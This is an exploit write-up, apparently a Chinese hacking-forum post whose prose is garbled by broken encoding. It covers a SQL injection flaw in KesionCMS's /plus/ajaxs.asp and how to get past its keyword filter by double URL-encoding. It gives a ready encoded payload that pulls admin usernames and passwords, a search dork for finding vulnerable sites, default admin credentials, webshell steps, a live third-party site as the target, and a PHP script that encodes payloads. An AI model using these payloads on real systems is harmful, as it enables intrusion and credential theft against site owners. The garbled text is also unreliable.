KesionCMSѴ 0day©

汾kesion v6.0-v7.0Լkesion v7.06 eshop
 
֮Դţо0dayΪֻ©ʵͬһ˲ɵġң©Ѿ¶ԭ©/user/Reg/regajax.aspµ©γ©λ/plus/ajaxs.aspļ©ԭһģs˻ҵµģ
 
ļ룺/plus/ajaxs.asp
 
Dim KS:Set KS=New PublicCls
 
Dim Action
 
Action=KS.S(Action)
 
Select Case Action
 
Case Ctoe CtoE
 
Case GetTags GetTags
 
Case GetRelativeItem GetRelativeItem
 
Case Shop_GetCoupon Shop_GetCoupon
 
Case Shop_ValidateCoupon Shop_ValidateCoupon
 
Case Shop_BrandOption Shop_BrandOption
 
Case Shop_CheckProID Shop_CheckProID
 
Case GetClassOption GetClassOption
 
Case GetFieldOption GetFieldOption
 
Case SpecialSubList SpecialSubList
 
Case GetArea GetArea
 
Case GetFunc GetFunc
 
Case AddFriend AddFriend
 
Case MessageSave MessageSave
 
Case CheckMyFriend CheckMyFriend
 
Case SendMsg SendMsg
 
Case SearchUser SearchUser
 
Case CheckLogin CheckLogin
 
Case relativeDoc relativeDoc
 
Case getModelType getModelType
 
Case getDocImage getDocImage
 
Case checkDocFname checkDocFname
 
Case addCart addShoppingCart
 
Case GetPackagePro GetPackagePro
 
Case GetSupplyContact GetSupplyContact
 
Case HitsGuangGao HitsGuangGao
 
Case GetClubBoardOption GetClubBoardOption
 
Case getclubboard GetClubboard
 
Case getonlinelist getonlinelist
 
End Select
 
..snip
 
Ϣ
 
Sub GetRelativeItem() //©ʼ
 
Dim Key:Key=UnEscape(KS.S(Key))//©λãֻks.sˡ
 
Dim Rtitle:rtitle=lcase(KS.G(rtitle))
 
Dim RKey:Rkey=lcase(KS.G(Rkey))
 
Dim ChannelID:ChannelID=KS.ChkClng(KS.S(Channelid))
 
Dim ID:ID=KS.ChkClng(KS.G(ID))
 
Dim Param,RS,SQL,k,SqlStr
 
If Key<> Then
 
If (Rtitle=true Or RKey=true) Then
 
If Rtitle=true Then
 
param=Param & title like %& key & %//ע©
 
end if
 
If Rkey=true Then
 
If Param= Then
 
Param=Param &  keywords like % & key & %
 
Else
 
Param=Param &  or keywords like % & key & %
 
End If
 
End If
 
Else
 
Param=Param &  keywords like % & key & %
 
End If
 
End If
 
If Param<> Then
 
Param= where InfoID<> & id &  and ( & param & )
 
else
 
Param= where InfoID<> & id
 
end if
 
If ChannelID<>0 Then Param=Param &  and ChannelID= & ChannelID
 
Param=Param & and verific=1
 
SqlStr=Select top 30 ChannelID,InfoID,Title From KS_ItemInfo & Param & order by id desc//ѯ
 
Set RS=Server.CreateObject(ADODB.RECORDSET)
 
RS.Open SqlStr,conn,1,1
 
If Not RS.Eof Then
 
SQL=RS.GetRows(-1)
 
End If
 
RS.Close
 
Dim Key:Key=UnEscape(KS.S(Key))ĺԶ庯KS.SйˣֵUnEscape룡
 Ȼǿȥԭͣ/KS_Cls/kesion.commoncls.asp
 
Function DelSql(Str)
 
Dim SplitSqlStr,SplitSqlArr,I
 
SplitSqlStr=dbcc|alter|drop|*|and |exec|or |insert|select|delete|update|count |master|truncate|declare|char|mid|chr|set |where|xp_cmdshell
 
SplitSqlArr = Split(SplitSqlStr,|)
 
For I=LBound(SplitSqlArr) To Ubound(SplitSqlArr)
 
If Instr(LCase(Str),SplitSqlArr(I))>0 Then
 
Die <script>alert(ϵͳ棡\n\n1ύжַ& SplitSqlArr(I) &;\n2Ѿ¼;\n3IP&GetIP&;\n4ڣ&Now&;\n Powered By Kesion.Com!);window.close();</script>
 
End if
 
Next
 
DelSql = Str
 
End Function
 
ȡRequest.Querystring Request.Form ֵ
 
Public Function S(Str)
 
S = DelSql(Replace(Replace(Request(Str), , ), , )) //ֹˣUnescape()չ˲ĩԲunicode뷽ʽղгֱ˵ַ磬ſԱΪ%2527ǡţĻͿphpĶα©ķʽƹˡ
 
ҪɹõķҪ
 
Dim KS:Set KS=New PublicCls
 
Dim Action
 
Action=KS.S(Action)
 
Select Case Action
 
Case Ctoe CtoE
 
Case GetTags GetTags
 
Case GetRelativeItem GetRelativeItem
 
ùеãõactionֵΪGetRelativeItemʱɵGetRelativeItem棬жkeyֵǷΪգԿkeyĺκֵconqu3r˹ͺܼˣֱӸ͵ķעˡ
 
£%) union select 1,2,username+|+ password from KS_AdminתΪµļɡ
 
/plus/ajaxs.asp?action=GetRelativeItem&key=conqu3r%2525%2527%2529%2520%2575%256e%2569%256f%256e%2520%2573%2565%256c%2565%2563%2574%2520%2531%252c%2532%252c%2575%2573%2565%2572%256e%2561%256d%2565%252b%2527%257c%2527%252b%2570%2561%2573%2573%2577%256f%2572%2564%2520%2566%2572%256f%256d%2520%254b%2553%255f%2541%2564%256d%2569%256e%2500
 
MSSQLİ汾ӦȨޣֱͨshell.
 
˴©CLngת·
 

 
/plus/ajaxs.asp?action=GetRelativeItem&key=%25
 
googleؼ֣intext:Powered By KesionCMS
 
ĬϺ̨/admin/login.asp Ĭ֤룺8888
 
̨webshellķ
 
1ִͨSql䣬Accessһ仰ľ
 
2ͨݿ⣬ݳһ仰
 
ʵhttp://www.allvison.com//plus/ajaxs.asp?action=GetRelativeItem&key=conqu3r%2525%2527%2529%2520%2575%256e%2569%256f%256e%2520%2573%2565%256c%2565%2563%2574%2520%2531%252c%2532%252c%2575%2573%2565%2572%256e%2561%256d%2565%252b%2527%257c%2527%252b%2570%2561%2573%2573%2577%256f%2572%2564%2520%2566%2572%256f%256d%2520%254b%2553%255f%2541%2564%256d%2569%256e%2500
 
ת:
 
[code]
 
<?php
 error_reporting(E_ERROR);
 set_time_limit(0);
 print_r('
 ================================================================================
 kesioncms ת
 ------by conqu3r
 ================================================================================
 ');
 
if ($argc<2) {
 print_r('
 ================================================================================
 Usage: php '.$argv[0].' "sql code";
 
Example:
 php '.$argv[0].' "\'%) union select...";
 ================================================================================
 ');
 die;
 }
 $str=$argv[1];
 for ($i=0; $i<=strlen($str); $i++){
 $temp .= "%25".base_convert(ord($str[$i]),10,16);
 }
 echo $temp."0";
 ?> 
